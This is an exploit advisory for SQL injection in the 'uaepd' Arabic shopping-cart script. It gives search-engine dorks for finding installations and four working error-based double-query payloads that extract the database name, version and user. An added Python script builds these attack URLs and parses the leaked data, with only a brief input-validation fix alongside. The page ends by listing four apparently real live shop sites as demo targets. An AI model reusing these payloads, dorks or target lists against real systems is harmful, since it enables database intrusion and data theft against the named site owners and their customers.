
uaepd script – Multiple SQL Injection Vulnerabilities

Author: AtT4CKxT3rR0r1ST , Published: 09-01-2014
uaepd script – Multiple SQL Injection Vulnerabilities
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.uaepd.net/
.:. Dork : [1] inurl:"products.php?cat_id=" "Powered by: PD "
           [2] inurl:"products.php?p_id" "Powered by: PD "
           [3] inurl:"page.php?id=" "Powered by: PD "
           [4] inurl:"news.php?id=" "Powered by: PD "
####################################################################

I. INTRODUCTION

uaepd script is an Arabic shopping-cart script with many features.

II. DESCRIPTION

#Control panel available in Arabic or English.
#Storefront viewable by visitors in Arabic and English.
#Option to run the store in one language or in both.
#Unlimited number of pages can be added.
#Formatting options for all store pages.
#YouTube links and images can be added to every store page.
#Main categories and sub-categories can be added.
#Unlimited number of products.
#Multiple images per product.
#Size and colour options for each product.
#Logo printed on product images automatically.
#Shipping price configurable per region.
#Shopping-cart purchasing system.
#Can run with or without a membership system.
#Three payment methods: bank transfer, pay on receipt, PayPal.
#Automatic e-mail sent on every purchase or booking.
#Product search feature.
#Multiple currencies supported.
#Comprehensive statistics for purchases and reservations.
#Guestbook section.
#Advertising space in multiple places.
#Ticker-bar feature.
#Store can be closed or opened.

III. BUG TYPE

SQL injection (error-based, double-query technique)

IV. BUG

site/products.php?cat_id=[sql injection]
site/products.php?p_id=[sql injection]
site/page.php?id=[sql injection]
site/news.php?id=[sql injection]

V. EXPLOIT

TO EXTRACT DATABASE NAME, VERSION AND USER:

site/products.php?cat_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
site/products.php?p_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
site/page.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
site/news.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
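The extraction above can be scripted. The following is an added example written for this page, not code from the advisory author or from the uaepd script: it builds the advisory's double-query payload for each of the four listed parameters, parses the database:version:user triple out of the MySQL "Duplicate entry" error that the GROUP BY on floor(rand(0)*2) provokes, and shows the server-side integer check that closes this class of bug. The base URL, the sample response body and all function names are assumptions.

```python
import re
from urllib.parse import urlencode

# The four injection points listed in section IV: (script, parameter).
INJECTION_POINTS = [
    ("products.php", "cat_id"),
    ("products.php", "p_id"),
    ("page.php", "id"),
    ("news.php", "id"),
]

# The advisory's payload. The inner SELECT concatenates database():version():user()
# and appends 0x7e ('~'); grouping on floor(rand(0)*2) makes MySQL collide on the
# temporary key and raise "Duplicate entry '<data>~1' for key 'group_key'",
# which leaks the string in the error message.
DOUBLE_QUERY_PAYLOAD = (
    "99999 and (select 1 from (select count(*),concat((select(select concat("
    "cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) "
    "from information_schema.tables limit 0,1),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a) and 1=1"
)


def build_url(base, script, param, payload=DOUBLE_QUERY_PAYLOAD):
    """Return the GET URL for one injection point with the payload URL-encoded."""
    return f"{base.rstrip('/')}/{script}?{urlencode({param: payload})}"


def all_urls(base):
    """One URL per injection point from section IV (base URL is an assumption)."""
    return [build_url(base, script, param) for script, param in INJECTION_POINTS]


# The '~' marker (0x7e in the payload) followed by the rand() bucket (0 or 1)
# terminates the leaked string inside MySQL's duplicate-key error text.
DUP_ENTRY_RE = re.compile(
    r"Duplicate entry '(?P<data>.*?)~[01]' for key '(?P<key>[^']*)'"
)


def parse_leak(response_body):
    """Return (database, version, user) from an error-based response, else None.

    version() can contain '-' and user() contains '@', but neither contains ':',
    so splitting on the first two colons is safe.
    """
    m = DUP_ENTRY_RE.search(response_body)
    if not m:
        return None
    parts = m.group("data").split(":", 2)
    if len(parts) != 3:
        return None
    return tuple(parts)


def coerce_id(raw):
    """Server-side fix for these integer IDs: accept only a plain decimal integer.

    Anything else (including the payload above) is rejected before it reaches
    the query; combine with a bound parameter rather than string concatenation.
    """
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("invalid id")
    return int(raw)


# Constructed sample response, modelled on the MySQL error text such a query
# produces on a vulnerable page; not captured from any real site.
SAMPLE_RESPONSE = (
    "<html><body>Query failed: "
    "Duplicate entry 'shop_db:5.1.73-log:shop_user@localhost~1' "
    "for key 'group_key'</body></html>"
)

if __name__ == "__main__":
    for url in all_urls("http://site"):
        print(url)
    print(parse_leak(SAMPLE_RESPONSE))
```

In practice the response is fetched with an ordinary HTTP client; parse_leak returns None when the page does not echo database errors, in which case the same payload is not a usable oracle and a blind (boolean or time-based) technique is needed instead.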

DEMOS:

http://sedenshop.com/products.php?p_id=3

http://www.henna.ae/products.php?cat_id=1

http://www.shah-een.com/news.php?id=1

http://www.nourita.com/products.php?cat_id=4

####################################################################
